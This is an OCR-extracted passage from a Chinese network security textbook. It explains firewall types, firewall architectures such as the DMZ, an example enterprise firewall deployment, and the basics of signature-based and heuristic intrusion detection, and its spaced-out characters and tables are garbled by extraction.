(3) 应 用 层 网 关 / 代 理 (Application Level Gateway/Proxy) 。 

1. 包 过 滤 防 火 墙 

包 过 滤 防 火 墙 是 第 一 代 防 火 墙 , 它 实 质 上 是 一 个 拦截 和 检查 所 有 通过 它 的 数据 包 的 
路 由 器 。 它 面向 网 络 底层 数据 流 进行 审计 和 管控 ,主要 工作 在 网 络 层 和 传输 层 ,在 网 络 上 
的 逻辑 位 置 如 图 7-11 所 示 。 

包 过 滤 防 火 墙 的 安全 策略 是 一 组 预定 义 的 规则 ,主要 根据 数据 包 IP 头 和 TCP 头 包 
含 的 一 些 关键 信息 ,来 决定 是 否 允许 该 数据 包 通 过 ,不 合乎 规则 的 数据 包 将 被 丢弃 。 对 于 
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外 部 网 络 ~ 一 内 部 网 络 


图 7-11 包 过 滤 防 火 墙 的 逻辑 位 置 


IP 数据 包 而 言 , 其 判断 依据 有 以 下 几 项 : 
(1) 源 IP 地 址 .目的 IP 地址 。 
(2) 数据 包 的 协议 类 型 ,如 TCP、UDP、ICMP、IGMP 等 。 
(3) TCP 或 UDP 的 源 端口 .目的 端口 。 
(4) TCP 标志 位 ,如 ACK、SYN、FIN、RST 等 。 
(5) IP 分 片 标志 位 。 
(6) 数据 包 流 向 , 进 站 或 出 站 。 
(7) 数据 包 流 经 的 网 络 接口 。 
例如 ,我 们 可 以 在 包 过 滤 防 火 墙 上 制定 如 表 7-3 所 示 的 过 滤 规 则 (ACL)。 


表 7-3 包 过 滤 规 则 示例 


规则 方 向 源 地 址 目的 地 址 传输 层 协议 动 作 
可 信 外 网 主机 

1 进 站 ey 内 网 (10*. *) HTTP 允许 (Permit) 
可 信和 外 网 主机 y i 

2 出 站 内 网 C16 二 -二 9 SMTP 人 允许 (Permit) 
3 进 站 /出 站 任意 任意 TFTP 拒绝 (Deny) 


其 中 规则 1 允许 来 自 外 网 可 信和 主机 162. 22. 34. 56 的 HTTP 数据 包 ; 规 则 2 允许 内 
网 主机 访问 外 网 可 信 主 机 上 的 电子 邮件 服务 ;规则 3 拒绝 TFTP 和 Telnet 服务 ,如 图 7-12 
所 示 。 

包 过 滤 防 火 墙 的 原理 简单 ,易于 理解 ,但 是 存在 一 些 缺 陷 : 

(1) 包 过 滤 的 规则 难于 配置 。 由 于 要 保证 逻辑 的 一 致 性 、 封 堵 端 口 的 有 效 性 和 规则 
集 的 正确 性 ,一 般 操作 人 员 难 以 胜任 ,也 容易 出 错 。 而 且 要 实现 复杂 的 过 滤 , 规 则 集 更 会 
十 分 复杂 。 例 如 ,拒绝 所 有 23 号 端口 (Telnet) 的 通信 和 量 ,这 很 简单 而 且 直 接 。 但 如 果 要 
允许 部 分 Telnet 的 流量 , 则 需要 对 允许 通信 的 IP 地 址 在 规则 集中 逐一 进行 定义 ,这 样 就 
会 导致 规则 集 变 得 很 长 。 

(2) 包 过 滤 防 火 墙 仅 依据 包头 中 几 个 有 限 的 关键 字段 进行 处 理 ,看 不 见 包 的 内 部 数 


2 ’ 


SEE . 


图 7-12 包 过 滤 防 火 墙 过 滤 规 则 示意 图 


V 
SMTP 
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外 网 可 信 主 


例如 162.22.34.56 


据 的 细节 ,例如 ,要 允许 某 些 Telnet 命令 而 拒绝 其 他 命令 ,就 超出 了 包 过 滤 防 火 墙 的 处 理 
能 力 。 

(3) 包 过 滤 是 无 状态 的 ,因为 包 过 滤 不 能 保持 与 传输 相关 的 状态 信息 ,或 与 应 用 相关 
的 状态 信息 。 

(4) 易 造成 数据 驱动 型 攻击 的 潜在 危险 。 

2. 状态 检测 防火 墙 

传统 包 过 滤 防 火 墙 每 次 处 理 一 个 包 , 接 受 或 拒绝 ,然后 对 下 一 个 包 进 行 处 理 。 从 一 个 
包 到 另 一 个 包 过 渡 时 ,没有 “状态 "或 上下文" 的 概念 。 这 种 无 状态 正 是 传统 包 过 滤 防 火 
墙 的 主要 缺陷 。 若 攻击 者 将 一 个 攻击 包 分 割 成 多 个 包 , 使 得 每 个 包 具 有 很 短 的 长 度 ,这 
样 ,防火 墙 就 检查 不 到 分 布 在 多 个 包 中 的 攻击 信号 。 因 为 在 TCP 协议 下 , 包 可 以 以 任意 
顺序 到 达 ,协议 组 负责 将 这 些 包 按 正 确 顺 序 重组 后 再 交 给 应 用 层 。 而 状态 检测 防火 墙 针 
对 传统 包 过 滤 进 行 了 功能 扩展 , 它 可 以 通过 跟踪 包 序列 和 从 一 个 包 到 另 一 个 包 的 状态 来 
防止 这 种 攻击 。 

状态 检测 防火 墙 采用 状态 检测 包 过 滤 的 技术 ,是 一 种 基于 连接 的 状态 检测 机 制 ,将 属 
于 同一 连接 的 所 有 包 作 为 一 个 整体 数据 流 看 待 , 构 成 连接 状态 表 , 通 过 规则 表 与 状态 表 的 
共同 配合 ,对 表 中 的 各 个 连接 状态 因素 加 以 识别 。 这 里 动态 连接 状态 表 中 的 记录 可 以 是 
以 前 的 通信 信息 ,也 可 以 是 其 他 相关 应 用 程序 的 信息 。 因 此 ,与 传统 包 过 滤 防 火 墙 的 静态 
过 滤 规 则 表 相 比 , 它 具 有 更 好 的 灵活 性 和 安全 性 。 

然而 ,状态 数据 包 过 滤 技 术 是 根据 会 话 的 信息 来 决定 单个 数据 包 是 否 可 以 通过 ,但 不 
能 实际 处 理应 用 层 数据 ,无 法 彻底 识别 数据 包 中 大 量 的 垃圾 邮件 .广告 以 及 木马 程序 

3. 应 用 层 代理 防火 墙 

应 用 层 代理 防火 墙 与 包 过 滤 技 术 完全 不 同 , 包 过 滤 技 术 是 在 网 络 层 拦截 所 有 的 信息 
流 ,而 代理 技术 是 针对 每 一 个 特定 应 用 都 有 一 个 程序 。 它 的 逻辑 位 置 在 应 用 层 上 ,如 
图 7-13 所 示 。 由 于 包 过 滤 防 火 墙 仅 看 包头 不 看 包 的 内 部 数据 ,因此 若 过 滤 规 则 允许 人 站 
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连接 到 25 号 端口 ,那么 包 过 滤 防 火 墙 会 将 任何 包 传递 到 该 端口 。 但 是 某 些 应 用 软件 ,如 
电子 邮件 转发 代理 ,常常 代表 所 有 用 户 , 从 而 要 求 赋予 它们 所 有 用 户 的 特权 ,如 存储 进入 
的 邮件 信息 供 内 部 用 户 阅读 等 ,从 而 存在 许多 潜在 的 安全 威胁 。 


HTTP|SMTP| FTP | Telnet 


图 7-13 应 用 层 代理 防火 墙 的 逻辑 位 置 


而 应 用 层 代 理 防火 墙 彻底 隔断 内 部 网 与 外 部 网 的 直接 通信 ,内 部 网 对 外 部 网 的 访问 
变 成 防火 墙 对 外 部 网 的 访问 ,而 外 部 网 返回 的 信息 再 由 防火 墙 转发 给 内 网 用 户 。 所 有 通 
信 都 必须 经 应 用 层 代 理 转 发 ,访问 者 任何 时 候 都 不 能 与 外 部 服务 器 建立 直接 的 TCP 连 
接 , 应 用 层 的 协议 会 话 过 程 必须 符合 代理 的 安全 策略 要 求 。 其 基本 原理 如 图 7-14 所 示 ， 
当代 理 服务 器 接收 到 客户 的 请 求 后 ,会 检查 用 户 请 求 是 否 符合 相关 安全 策略 的 要 求 , 如 果 
符合 ,代理 服务 器 会 代表 客户 ,去 服务 器 那里 取 回 所 需 信息 ,再 转发 给 客户 。 


送 请 求 一 一 一 | 发 请 求 一 一 一 | 
站 发 送 请 求 应 用 层 代 转发 请 求 局 
理 防火 墙 
| 一 一 一 转发 响应 一 一 一 请 求 响应 


图 7-14 应 用 层 代理 防火 墙 的 工作 原理 


目前 常见 到 的 应 用 层 代 理 防 火 墙 产品 有 : 商业 版 代理 (cache) 服 务 器 ,开源 防火 墙 软 
件 TIS FWTK(Firewall toolkit)、Apache 和 Squid 等 。 

应 用 层 代理 网 关 加 强 了 防火 墙 的 安全 性 ,隔断 了 内 网 与 外 网 的 直接 通信 ,避免 了 数据 
驱动 型 攻击 的 发 生 ,但 也 存在 一 些 较 严重 的 缺陷 : 

(1) 代理 是 不 透明 的 ,用 户 可 能 需要 改造 网 络 的 结构 甚至 应 用 系统 ,在 访问 代理 服务 
的 每 个 系统 上 安装 特殊 的 软件 。 

(2) 为 了 应 付 大 量 的 网 络 连接 并 还 原 到 应 用 层 , 防 火 墙 额外 的 处 理 负 载 大 幅 攀 升 ,从 
而 影响 性 能 ,处 理 速 度 比 包 过 滤 防 火 墙 要 慢 , 其 至 成 为 网 络 瓶 颈 。 

(3) 对 每 一 个 应 用 ,都 需要 一 个 专门 的 代理 ,来 解释 应 用 层 命令 的 功能 ,如 解释 FTP、 
Telnet 等 命令 就 需要 专门 的 FTP 代理 服务 器 .Telnet 代理 服务 器 等 ,灵活 性 不 够 。 
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(4) 在 面临 应 用 升级 ,或 出 现 新 的 应 用 层 协 议 时 ,代理 服务 程序 也 需要 随 之 改变 。 

4. 网 络 地 址 转换 技术 

目前 的 防火 墙 产 品 都 提供 了 网 络 地 址 转换 (Network Address Translation, NAT) 技 
术 , 主 要 用 在 两 个 方面 : 

(1) 隐藏 和 保护 内 部 网 络 的 IP 地 址 。 

(2) 解决 IP 地 址 不足 的 问题 ,将 内 部 网 络 私 有 IP 地 址 翻译 为 公用 地 址 (合法 IP 
地 址 ) 。 

实际 上 ,NAT 就 是 把 内 部 网 络 中 的 IP 包头 内 内 部 IP 地 址 信息 ,用 可 以 访问 外 部 网 
络 的 公用 IP 地 址 信息 替换 ,如 图 7-15。 公 用 地 址 是 由 Internet 网 络 信息 (InterNIC) 分 配 
的 IP 地 址 ,要 想 在 Internet 上 实现 通信 ,就 必须 有 一 个 公用 地 址 。 


Stepl : Step2 : 

源 IP ，10.62.1.3 源 IP: 23.232.3 [一 | 

目的 IP: 39.34.1.2 \、 | 目的 IP :39.34.1.2 i 
验 Stept : Step3: 

源 IP : 39.34.1.2 防火 墙 | 源 IP : 39.34.1.2 邮件 服务 器 

目的 IP: 10.62.1.3 目的 IP: 23.2.32.3 39.34.1.2 


图 7-15 ”NAT 示意 图 


根据 NAT 的 工作 方式 ,可 以 分 为 静态 NAT、 动 态 NAT 和 端口 地 址 转换 (Port 
Address Translation,PAT) 。 静 态 NAT 中 ,IP 地 址 映射 是 一 对 一 的 ,将 某 个 私有 IP 地 
址 转换 为 特定 的 某 个 公用 IP 地 址 ,如 图 7-16 所 示 。 动 态 NAT 中 ,将 内 部 网 络 的 私有 IP 
地 址 转换 为 公用 地 址 时 ,是 随机 的 从 预先 配置 的 地 址 池 中 选取 一 个 。 端 口 地 址 转换 是 把 
内 部 地 址 映射 到 外 部 网 络 的 一 个 公用 IP 地 址 的 不 同 端口 上 。 


静态 NAT 地 址 映射 列表 


专用 地 址 公用 地 址 
内 部 网 络 172.16.1.1 11.1.1.1 


局 172.16.1.2 11.1.1.2 
172.16.1.3 11.1.1.3 


Internet 


图 7-16 静态 NAT 
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5. 个 人 防火 墙 


个 人 防火 墙 (Personal Firewall) 运 行 在 它 所 要 保护 的 计算 机 上 ,用 来 隔离 不 希望 的 、 
来 自 网 络 的 通信 量 。 个 人 防火 墙 是 常规 防火 墙 功能 的 补充 ,可 以 针对 单个 主机 设置 可 接 
受 的 数据 类 型 ,或 者 在 连接 因特网 时 ,用 来 弥补 常规 防火 墙 中 缺少 的 过 滤 规 则 。 现 有 商业 
个 人 防火 墙 包括 天 网 个 人 防火 墙 ` Norton 个 人 防火 墙 、 McAfee 个 人 防火 墙 和 Zone 
Alarm 等 。 

与 网 络 防火 墙 过 滤 进 出 网 络 的 通信 量 类 似 , 个 人 防火 墙 过 滤 单 个 工作 站 的 通信 量 。 
工作 站 对 恶意 代码 或 恶意 活动 代理 (ActiveX 或 Java Applet) ,存储 在 工作 站 上 的 个 人 数 
据 泄露 ,为 寻找 潜在 弱点 的 弱点 扫描 等 攻击 方式 的 防御 能 力 差 。 个 人 防火 墙 经 过 配置 后 
可 以 实施 一 些 安全 策略 。 例 如 ,用 户 可 以 确定 某 些 网 址 (如 公司 内 部 网 中 的 计算 机 ) 具 有 
很 高 的 可 信和 度 , 而 其 他 站 点 则 不 可 信赖 。 用 户 可 以 定义 相应 的 策略 ,以 便 允许 在 本 公司 所 
在 网 段 实现 代码 下 载 无 限制 的 数据 共享 及 管理 访问 ,而 不 允许 来 自 其 他 站 点 的 访问 。 

把 病毒 扫描 器 和 个 人 防火 墙 结合 在 一 起 使 用 不 但 有 效 ,而 且 效 率 高 。 用 户 并 不 是 每 
天 运行 病毒 扫描 器 ,而 是 偶尔 运行 ,而 且 此 时 病毒 扫描 器 在 用 户 内 存 中 执行 时 ,检查 到 的 
问题 是 在 既成 事实 (如 病毒 已 随 电子 邮件 附件 下 载 到 本 地 ) 之 后 。 但 如 果 将 病毒 扫描 器 和 
个 人 防火 墙 结合 起 来 ,个 人 防火 墙 就 会 将 所 有 进入 的 电子 邮件 中 未 打开 的 附件 进行 事先 
的 检查 。 

6. 几 种 类 型 防火 墙 的 比较 

表 7-4 对 几 种 防火 墙 类 型 的 不 同 之 处 进行 了 概括 。 


表 7-4 不 同类 型 防火 墙 的 比较 


包 过 滤 防 火 墙 状态 检测 防火 墙 应 用 层 代理 防火 墙 个 人 防火 墙 
最 简单 较 复杂 更 复杂 与 包 过 滤器 防火 墙 相似 
只 看 见地 址 和 服 看 见 包 的 全 部 数据 
dag 能 看 见地 址 和 数据 。 | 分 看 见 包 的 全 部 数据 部 分 

、 ， my 能 审计 活动 ,并 通常 实现 了 
审计 困难 可 能 审计 能 审计 活动 de 
基于 连接 规则 的 | 基于 通过 包 的 信息 过 汪 w ,sw。 | 基于 单个 包 中 的 信息 (使 用 
过 滤 滤 一 “首部 或 数据 段 “| 基于 代理 的 行为 过 滤 | 首部 或 数据 ) 过 滤 
复杂 的 寻 址 规则 | 通常 预先 配置 以 检测 | 简单 的 代理 可 以 代替 oa 
使 得 配置 困难 ”| 攻击 信号 复杂 的 寻 址 规则 es . 


723 防火 墙 体系 结构 


在 一 个 网 络 系统 中 ,防火 墙 可 能 是 单个 的 主机 系统 ,但 更 多 的 可 能 是 多 个 设备 组 成 的 
一 个 安全 防护 系统 ,其 体系 结构 可 能 多 种 多 样 。 防 火 墙 体系 结构 的 设计 ,需要 根据 业务 和 
安全 控制 的 需求 ,合理 规划 内 部 网 络 的 拓扑 结构 、 合 理 划分 安全 区 域 . 恰 当 的 部 署 防火 墙 。 
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从 本 质 上 讲 , 现 有 的 防火 墙 体系 结构 主要 有 : 双 宿 网 关 、 屏 项 主机 、 屏 蔽 子 网 .多 防火 
墙 等 。 

1. 双 宿 网 关 

双 宿 网 关 (dual-homed gateway) 的 基本 结构 如 图 7-17 所 示 , 它 拥有 两 个 连接 到 不 同 
网 络 上 的 网 络 接口 。 例 如 ,一 个 连接 外 部 不 可 信任 的 网 络 , 一 个 连接 内 部 可 信任 的 网 络 。 
这 种 体系 结构 最 大 的 优点 是 IP 层 的 通信 是 被 阻止 的 ,两 个 网 络 之 间 的 通信 可 通过 应 用 层 
代理 服务 的 方法 实现 。 双 重 宿主 主机 是 唯一 的 隔 开 内 部 网 络 和 外 部 网 络 之 间 的 屏障 ,所 
以 其 用 户口 令 控 制 是 安全 的 关键 ,应 配备 强大 的 身份 认证 系统 以 阻挡 外 部 不 可 信和 网 络 的 


非法 登录 。 
SE 双 宿主 机 
<S 
I 内 部 网 络 | 
2 » S 
图 7-17 双 宿 网 关 体系 结构 
2. 屏蔽 主机 


屏 项 主机 防火 墙 强迫 所 有 的 外 部 主机 与 一 个 堡垒 主机 相连 ,而 不 让 它们 直接 与 内 部 
主机 相连 ,其 体系 结构 如 图 7-18 所 示 , 巾 包 过 滤 路 由 器 和 堡垒 主机 组 成 。 包 过 滤 路 由 器 
配置 在 内 部 网 和 外 部 网 之 间 ,保证 外 部 系统 对 内 部 网 络 的 操作 只 能 经 过 堡垒 主机 。 入 侵 
者 要 破坏 内 部 网 络 ,需要 首先 渗透 这 两 种 不 同 的 安全 系统 ,因此 屏蔽 主机 防火 墙 实现 了 更 
高 的 安全 性 。 堡 又 主机 配置 在 内 部 网 络 上 ,是 外 部 网 络 主机 连接 到 内 部 网 络 主机 的 桥梁 ， 
它 需 要 拥有 高 等 级 的 安全 。 

3. 屏蔽 子 网 

屏蔽 子 网 体系 结构 是 目前 很 多 机 构 采 用 的 体系 结构 ,在 本 质 上 与 屏蔽 主机 体系 结构 
一 样 ,但 添加 了 额外 的 一 层 保 护 体 系 一 一 周边 网 络 ,或 者 称 为 非 军事 化 区 域 
(Demilitarized Zone,DMZ) ,如 图 7-19 所 示 。 堡 又 主机 位 于 周边 网 络 上 ,周边 网 络 和 内 部 
网 络 被 内 部 路 由 器 分 开 。DMZ 存在 的 好 处 在 于 ,通过 周边 网 络 隔离 堡 从 主机 ,减少 保全 
主机 被 侵入 的 影响 ,保护 内 部 网 络 。 入 侵 者 即使 控制 了 堡垒 主机 ,也 只 能 侦 听 到 周边 网 络 
的 数据 ,而 不 能 侦 听 到 内 部 网 络 的 数据 。 
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Internet 


吕 吕 


图 7-18 屏蔽 主机 体系 结构 


非 军 事 区 DMZ 
被 屏蔽 的 子 网 


图 7-19 屏蔽 子 网 体系 结构 


724 防火 墙 配置 举例 


针对 本 书 中 某 市 城南 区 中 小 企业 服务 平台 的 实际 需要 ,可 以 采用 图 7-20 中 防火 墙 的 
部 署 方案 。 

(1) 采用 屏蔽 子 网 体系 结构 ,设置 非 军事 化 区 DMZ。 

(2) 企业 内 部 网 络 划 分 部 门 子 网 ,包括 普通 员工 子 网 ,市 场 销售 部 门 子 网 .管理 和 财 
务 部 门 子 网 ,并 为 不 同 的 用 户 设置 不 同 的 Internet 访问 权限 ,可 以 控制 用 户 不 同时 段 的 
Internet 访问 权限 ,合理 分 配 网 络 资源 。 
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(3) 对 企业 重要 部 门 ,如 管理 部 门 和 财务 部 门 ,进行 单独 划分 区 域 地 址 组 ,配置 内 部 
防火 墙 ,添加 策略 只 有 授权 用 户 才能 访问 ,不 能 被 其 他 未 授权 部 门 的 员工 电脑 访问 ,更 不 
能 被 互联 网 访问 操作 。 


图 7-20 某 市 南城 区 中 小 企业 防火 墙 配置 


可 采取 如 下 配置 策略 : 

(1) 财务 部 门 为 了 防止 不 安全 因素 的 侵入 ,可 以 配置 成 只 允许 收发 邮件 访问 某 些 财 
务 网 站 或 者 网 银 目 的 地 ,并 且 使 用 MSN 等 通信 工具 通信 。 

(2) 销售 部 可 以 定向 访问 内 网 服务 器 ,使 用 QQ MSN 等 通信 软件 与 用 户 交流 。 

(3) 管理 部 门 由 于 业务 需要 获取 信息 的 优先 级 比较 高 可 以 纵览 全 局 ,允许 各 种 上 网 

(4) 普通 员工 在 上 班 时 间 不 允许 使 用 MSN QQ 等 通信 工具 ,以 及 迅雷 等 多 线程 高 
速 下 载 工 具 , 防 止 有 些 员工 大 量 占用 公司 网 络 带宽 下 载 非 工作 私人 流量 而 导致 的 网 络 
卡 、. 慢 ,使 得 企业 员工 上 班 时 间 不 受 干扰 ,高 效 工 作 ;下 班 时 间 , 可 以 放 开 上 述 上 网 
限制 。 

(5) 出 差 员工 可 以 利用 VPN 方便 的 拨 入 单位 内 部 网 络 ,使 用 内 部 资源 网 上 远程 
办 公 。 
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7.3 入 侵 检 测 系 统 


731 IDS 概 述 


入 侵 检测 系统 (Intrusion Detection System,IDS) 是 一 种 设备 ,通常 是 另 一 台独 立 的 
计算 机 ,通过 监视 内 部 的 活动 来 识别 恶意 的 或 可 疑 的 事件 。IDS 是 一 种 探测 器 , 像 烟雾 探 
测 器 一 样 , 如 果 发 生 了 指定 的 事件 就 会 触发 警报 。 入 侵 检测 系统 采用 实时 (或 近似 实时 ) 
运行 方式 ,监视 活动 并 及 时 向 管理 员 报警 ,以 便 采 取保 护 措施 。 

IDS 是 对 网 络 安全 极 好 的 补充 。 防 火 墙 封锁 到 达 特 定 端口 或 地 址 的 通信 量 , 并 限 
制 使 用 某 些 协议 来 降低 其 影响 。 但 根据 定义 ,防火 墙 必须 允许 一 些 通 信和 量 进入 一 个 受 
保护 区 域 。 监 视 通 信和 量 在 受 保护 区 域内 的 真实 活动 是 IDS 的 工作 。IDS 能 实现 多 种 
功能 : 

(1) 监视 用 户 和 系统 活动 。 

(2) 审计 系统 配置 中 存在 的 弱点 和 错误 配置 。 

(3) 评估 关键 系统 和 数据 文件 的 完整 性 。 

(4) 识别 系统 活动 中 存在 的 已 知 攻击 模式 。 

(5) 通过 统计 分 析 识别 不 正常 活动 。 

(6) 管理 审计 跟踪 , 当 用 户 违反 策略 或 正常 活动 时 ,给 出 警示 。 

(7) 纠正 系统 配置 错误 。 

(8) 安装 .运行 陷阱 以 记录 入 侵 者 的 相关 信息 。 

没有 一 个 IDS 能 实现 上 述 所 有 功能 。 在 理想 情况 下 ,IDS 应 该 快速 简单 而 且 准确 ， 
同时 也 应 该 相当 完善 。 它 应 该 能 以 极 小 的 性 能 代价 检测 出 所 有 的 攻击 。 一 个 IDS 中 可 
能 会 使 用 下 面 所 列 的 部 分 或 全 部 设计 方法 : 

(1) 在 包头 上 进行 过 滤 。 

(2) 在 包 内 容 上 进行 过 滤 。 

(3) 维护 连接 状态 。 

(4) 使 用 复杂 的 多 包 标 记 。 

(5) 使 用 最 少 的 标记 产生 最 大 的 效果 。 

(6) 实时 、 在 线 过 滤 。 

(7) 隐藏 自己 。 

(8) 使 用 优化 的 滑动 时 间 窗 口 大 小 来 匹配 标记 。 

1. 警报 响应 

不 论 哪 种 入 侵 检测 系统 都 应 在 发 现 匹 配 时 报警 。 警 报 的 范围 包含 从 普通 到 重大 的 所 
有 事件 ,比如 写 审计 日 志 的 注释 、 记 录 系统 安全 管理 员 操 作 等 。 一 些 特别 设计 的 入 侵 检测 
系统 还 允许 用 户 决 定 系 统 对 什么 样 的 事件 采取 什么 样 的 措施 。 

哪些 是 可 能 的 响应 呢 ? 范围 是 无 限 的 ,可 以 是 管理 员 ( 和 程序 ) 能 想到 的 任何 事情 。 
一 般 情况 下 ,响应 主要 分 为 三 类 (三 类 响应 可 部 分 或 全 部 应 用 到 单个 响应 中 ) : 
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(1) 监视 器 ,收集 数据 ,可 能 会 在 必要 时 增加 收集 数据 的 总 量 。 

(2) 保护 ,采取 行动 减少 暴露 。 

(3) 叫 人 。 

对 具有 一 般 ( 最 初 的) 影响 的 攻击 ,采用 监视 器 比较 恰当 。 监 视 器 的 真正 目标 在 于 观 
察 和 人 侵 者 ,看 他 访问 了 哪些 资源 或 者 试图 进行 什么 样 的 攻击 。 另 一 种 可 能 使 用 监视 器 的 
情况 是 记录 来 自给 定 源 地 址 的 所 有 通信 量 , 用 于 以 后 分 析 。 监 视 器 对 攻击 者 应 是 不 可 见 
的 。 保 护 意味 着 增加 访问 控制 措施 ,甚至 使 得 一 个 资源 不 可 用 (比如 ,关闭 一 个 网 络 连接 
或 者 使 一 个 文件 不 能 访问 ) 。 系 统 甚至 可 能 切断 攻击 者 正在 使 用 的 网 络 连接 。 与 监视 器 
相反 ,保护 对 攻击 者 常常 是 可 见 的 。 最 后 , 叫 人 类 型 的 入侵 检测 系统 允许 个 人 进行 辨别 ， 
IDS 能 立即 采取 初步 的 防御 措施 ,同时 也 向 人 报警 ,人 也 许 会 花 几 秒 、 几 分 或 者 更 长 的 时 
间 进 行 响应 。 

2. 错误 结果 

入 侵 检测 系统 并 不 是 完美 无 缺 的 ,其 最 大 的 问题 是 出 现 错误 。 虽然 IDS 大 多 数 情况 
下 能 正确 检测 到 入 侵 者 ,但 也 可 能 会 犯 两 种 不 同类 型 的 错误 : 一 种 是 对 非 真 正 攻击 报警 
( 误 报 ) , 另 一 种 是 对 真正 的 攻击 不 报警 ( 漏 报 )。 太 多 的 误 报 意味 着 管理 员 将 降低 对 IDS 
报警 的 信任 ,有 可 能 导致 真正 的 报警 被 忽略 。 但 漏 报 意味 着 真正 的 攻击 将 通过 IDS 而 没 
有 采取 措施 。 误 报 和 漏 报 的 程度 代表 了 系统 的 敏感 性 。 所 以 绝 大 多 数 IDS 允许 管理 员 
调整 系统 的 敏感 性 ,以 便 在 误 报 和 漏 报 之 间 取 得 可 接受 的 平衡 。 


732 IDS 的 类 型 


常用 的 入 侵 检测 系统 是 基于 签名 的 IDS 和 启发 式 IDS。 基 于 签名 (Signature-Based) 
的 入 侵 检测 系统 实现 简单 的 模式 匹配 ,并 报告 与 已 知 攻击 类 型 的 模式 匹配 情况 。 启 发 式 
(Heuristic) 入 侵 检 测 系统 (又 称 基 于 异常 的 人 侵 检 测 系 统 ) 建 立 了 一 个 可 接受 行为 模型 ， 
并 对 该 模型 的 出 错 情 况 做 上 标记 ;在 以 后 使 用 时 ,管理 员 可 以 将 带 标记 的 行为 作为 可 接受 
的 行为 ,以 便 启 发 式 IDS 把 以 前 未 分 类 的 行为 作为 可 接受 的 行为 进行 处 理 。 

入 侵 检 测 设备 可 以 是 基于 网 络 的 或 者 是 基于 主机 的 。 基 于 网 络 (Network-Based) 的 
IDS 是 附加 在 网 络 上 的 一 台 单独 的 设备 ,监视 经 过 该 网 络 的 通信 量 ;基于 主机 (Host- 
Based) 的 IDS 运行 在 单个 工作 站 客户 端 或 主机 上 ,用 于 保护 该 主机 。 

1. 基于 标记 的 入 侵 检 测 

对 一 种 已 知 的 攻击 类 型 做 简单 的 标记 可 描述 以 下 情况 : 一 系列 的 TCP SYN 包 被 连 
续 发 往 许多 不 同 的 端口 ,而 且 有 时 彼此 很 接近 ,这 是 端口 扫描 时 会 发 生 的 情况 。 入 侵 检 测 
系统 可 能 不 会 发 现 第 一 个 SYN 包 ( 比 如 发 往 80 端口 ) 中 有 什么 异常 情况 ,然后 另 一 个 到 
25 端口 的 包 ( 从 相同 的 源 地 址 发 来 的 ) 也 是 如 此 。 但 是 , 随 着 越 来 越 多 的 端口 收 到 SYN 
包 , 尤 其 在 一 些 没 有 开放 的 端口 也 收 到 了 SYN 包 , 这 种 模式 反映 了 可 能 有 人 在 进行 端口 
扫描 。 同 样 , 如 果 收 到 数据 长 度 为 65535 字 节 的 ICMP 包 , 表 明 某 些 协 议 栈 的 实现 出 现 了 
故障 ,这 样 的 包 就 是 一 种 需要 观察 的 模式 。 

基于 标记 的 检测 中 存在 的 问题 就 是 标记 本 身 。 攻 击 者 会 对 一 种 基本 的 攻击 方式 加 以 
修改 ,使 之 与 这 种 攻击 的 已 知 标记 不 匹配 。 例 如 ,攻击 者 可 以 把 小 写字 母 转换 为 大 写字 
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母 ,或 者 把 符号 (比如 空格 ) 转 换 为 其 等 价 的 字符 代码 %20。 这 样 ,为 了 识别 %20 与 空格 
匹配 ,IDS 必须 对 数据 流 的 规范 形式 进行 必要 的 处 理 。 攻 击 者 也 可 能 插入 一 些 IDS 会 看 
到 的 ,格式 错误 的 包 , 故 意 引 起 模式 不 匹配 ,协议 处 理 栈 会 因为 其 格式 不 对 而 丢弃 这 些 包 。 
这 些 变 化 都 可 以 被 IDS 检测 到 ,只 是 更 多 的 标记 要 求 IDS 做 更 多 的 附加 工作 ,这 会 降低 
系统 的 性 能 。 

当然 ,基于 标记 的 IDS 因为 标记 还 没有 安装 在 数据 库 而 不 能 检测 一 种 新 的 攻击 。 在 
每 种 攻击 类 型 刚 开 始 时 ,由 于 是 一 种 新 模式 ,IDS 是 无 法 对 这 类 攻击 发 出 警告 的 。 

基于 标记 的 IDS 趋向 于 使 用 统计 分 析 方 法 ,通过 使 用 统计 工具 可 得 到 关键 指标 的 测 
量 样 本 (如 外 部 活动 总 量 、 活 动 进程 数 、 事 务 数 等 ), 也 可 决定 收集 测量 数据 是 否 适合 预先 
确定 攻击 标记 。 

理想 的 标记 应 该 匹配 每 一 种 攻击 实例 ,匹配 攻击 的 微妙 变化 ,而 不 会 匹配 不 是 攻击 部 
分 的 通信 量 。 然 而 ,这 个 目标 遥 不 可 及 。 

2. 启发 式 入 侵 检测 

由 于 标记 受到 特定 的 ` 已 知 的 攻击 模式 的 限制 ,使 得 另 一 种 形式 的 人 侵 检测 有 了 用 武 
之 地 。 启 发 式 人 侵 检测 寻找 的 是 异常 的 举动 ,而 不 是 寻求 匹配 。 其 初期 工作 是 关注 个 人 
的 行为 ,试图 发 现 有 助 于 理解 正常 和 异常 行为 的 个 人 特征 。 例 如 : 某 个 用 户 可 能 总 是 以 
阅读 电子 邮件 开始 一 天 的 工作 ,使 用 文字 处 理 器 编写 大 量 的 文档 ,偶尔 备份 一 下 文件 。 这 
是 一 些 正常 活动 。 该 用 户 看 起 来 很 少 使 用 管理 员 的 系统 功能 。 如 果 这 个 人 试图 访问 敏感 
的 系统 管理 功能 ,这 一 新 的 行为 可 能 暗示 着 其 他 人 正在 以 该 用 户 的 身份 活动 。 

如 果 考 虑 在 使 用 的 有 安全 隐患 的 系统 , 它 开始 是 “干净 的 ”, 没 有 被 入 侵 , 后 来 则 变 
“ 脏 ” 了 ,完全 处 于 危险 之 中 。 在 系统 从 “干净 ” 变 “ 脏 ”的 过 程 中 ,没有 使 用 行为 跟踪 点 , 系 
统 很 可 能 是 在 开始 时 ,只 稍微 有 点 “ 脏 " 事 件 发 生 , 其 至 是 偶然 的 ,然后 , 随 着 “ 脏 " 事 件 逐 渐 
增加 ,系统 逐渐 陷 人 更 深 的 危险 之 中 。 这 些 事件 中 的 任何 一 个 可 能 被 接受 ,如 果 只 累积 计 
算 , 这 些 事件 发 生 的 顺序 .速度 可 能 就 是 一 种 信号 , 它 表 明 有 不 能 被 接受 的 事件 发 生 了 。 
和 人 侵 检测 系统 的 推理 引擎 可 以 持续 分 析 系 统 , 当 系统 * 脏 ”事件 超过 了 阔 值 后 ,就 发 出 
警告 。 

推理 引擎 有 两 种 工作 方式 。 一 种 是 称 为 基于 状态 的 人 侵 检 测 系统 查看 系统 审查 所 有 
被 修改 的 状态 或 配置 。 当 系统 转向 不 安全 模式 时 ,它们 就 尝试 进行 人 侵 检 测 。 其 他 时 候 ， 
